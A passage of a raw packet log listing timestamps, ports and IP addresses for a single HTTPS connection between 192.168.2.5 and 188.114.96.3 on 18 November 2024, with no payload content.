Nov 18, 2024 11:45:11.205164909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.205215931 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.205219984 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.241652012 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.241725922 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.241731882 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.289652109 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.312525034 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312604904 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312639952 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312649012 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.312661886 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312702894 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.312715054 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312901974 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312939882 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.312948942 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.312952995 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313002110 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.313004971 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313772917 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313792944 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313842058 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313846111 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.313858032 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313868999 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.313899994 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.313930035 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.314800024 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.314837933 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.314857960 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.314862013 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.314891100 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.314914942 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.315665007 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.315737963 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.315762043 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.315818071 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.316592932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.316658974 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.322433949 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.322493076 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.322654963 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.322717905 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.358690023 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.358767986 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430022955 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430085897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430094004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430109024 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430152893 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430171013 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430197954 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430205107 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430244923 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430433035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430481911 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430485964 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430526972 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.430620909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.430681944 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.431217909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.431279898 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.431339025 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.431397915 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.431401968 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.431421995 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.431456089 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.431483030 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.432080030 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.432142019 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.432152033 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.432156086 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.432188034 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.432188988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.432205915 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.432241917 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433010101 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433062077 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433074951 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433100939 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433113098 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433118105 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433146954 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433156013 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433165073 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.433197021 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433219910 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.433969975 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434027910 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.434047937 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434096098 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434103966 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.434109926 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434154034 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.434916973 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434962034 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.434972048 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.434976101 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.435009956 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.435015917 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.435024023 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.435075998 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.436964989 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.437026978 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.439810038 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.439857006 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.439865112 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.439873934 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.439907074 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.439943075 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.439990044 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.439995050 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.440036058 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.440040112 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.440054893 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.440084934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.476114988 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.476192951 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.476290941 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.476336956 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.476346016 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.476352930 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.476392984 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.547063112 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547118902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547143936 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.547153950 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547207117 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.547746897 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547775984 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547841072 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.547846079 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.547890902 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.548111916 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548161983 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548182964 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.548187017 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548223019 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.548827887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548855066 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548898935 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.548903942 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.548975945 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.549388885 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.549413919 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.549477100 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.549480915 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.549504995 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.552231073 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.552262068 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.552292109 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.552298069 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.552340031 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.552874088 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.552892923 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.552947044 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.552952051 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.553368092 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.553400040 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.553431988 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.553436041 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.553462029 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.554404020 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554421902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554465055 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.554470062 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554493904 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.554778099 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554800987 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554831028 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.554835081 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.554863930 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.555493116 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.555510998 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.555553913 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.555557966 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.555583000 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.556973934 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.556998014 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.557033062 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.557037115 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.557070971 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.557307005 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.557323933 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.557367086 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.557370901 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.557414055 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.593750954 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.593818903 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.593864918 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.593874931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.593904018 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.637698889 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.637753963 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.637864113 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.637877941 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.638012886 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.665128946 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665174961 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665232897 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.665242910 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665271044 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.665541887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665587902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665615082 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.665620089 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.665663004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.665971041 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666014910 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666049004 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.666053057 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666079044 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.666372061 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666416883 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666436911 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.666451931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666479111 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.666769981 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666810036 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666836023 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.666840076 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.666866064 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667119026 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667182922 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667201996 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667207003 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667232037 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667532921 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667572975 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667608023 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667613983 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667639017 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667903900 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667963982 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.667970896 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.667993069 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668024063 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668150902 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668193102 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668212891 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668219090 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668260098 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668514967 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668565989 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668592930 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668596983 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668622017 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668775082 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668822050 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668842077 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.668847084 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.668895006 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.669063091 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.669106960 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.669131994 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.669137001 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.669161081 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.674371958 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.674417973 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.674444914 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.674449921 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.674487114 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.674901009 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.674948931 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.674977064 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.674981117 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.675007105 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.710936069 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.710999966 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.711046934 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.711055994 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.711297035 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.711404085 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.711447001 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.711672068 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.711678028 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.758344889 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.782402992 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782433987 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782481909 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782558918 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.782568932 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782655954 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782685041 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.782690048 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782754898 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.782768011 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782799959 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.782880068 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.782974958 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783026934 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783113003 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783118010 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783160925 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783339024 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783389091 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783467054 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783472061 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783519030 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783655882 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783713102 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783751965 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783756018 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.783782959 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783803940 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.783967018 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784017086 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784111977 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784116030 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784158945 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784318924 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784358978 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784405947 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784410000 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784461021 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784610033 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784650087 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784686089 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784689903 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784734964 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784904003 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784945965 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.784977913 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.784982920 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785011053 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785036087 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785152912 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785204887 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785232067 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785237074 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785289049 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785578966 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785623074 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785660982 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785665035 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.785693884 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.785717964 CET	49706	443	192.168.2.5	188.114.96.3
Nov 18, 2024 11:45:11.786334991 CET	443	49706	188.114.96.3	192.168.2.5
Nov 18, 2024 11:45:11.786381960 CET	443	49706	188.114.96.3	192.168.2.5
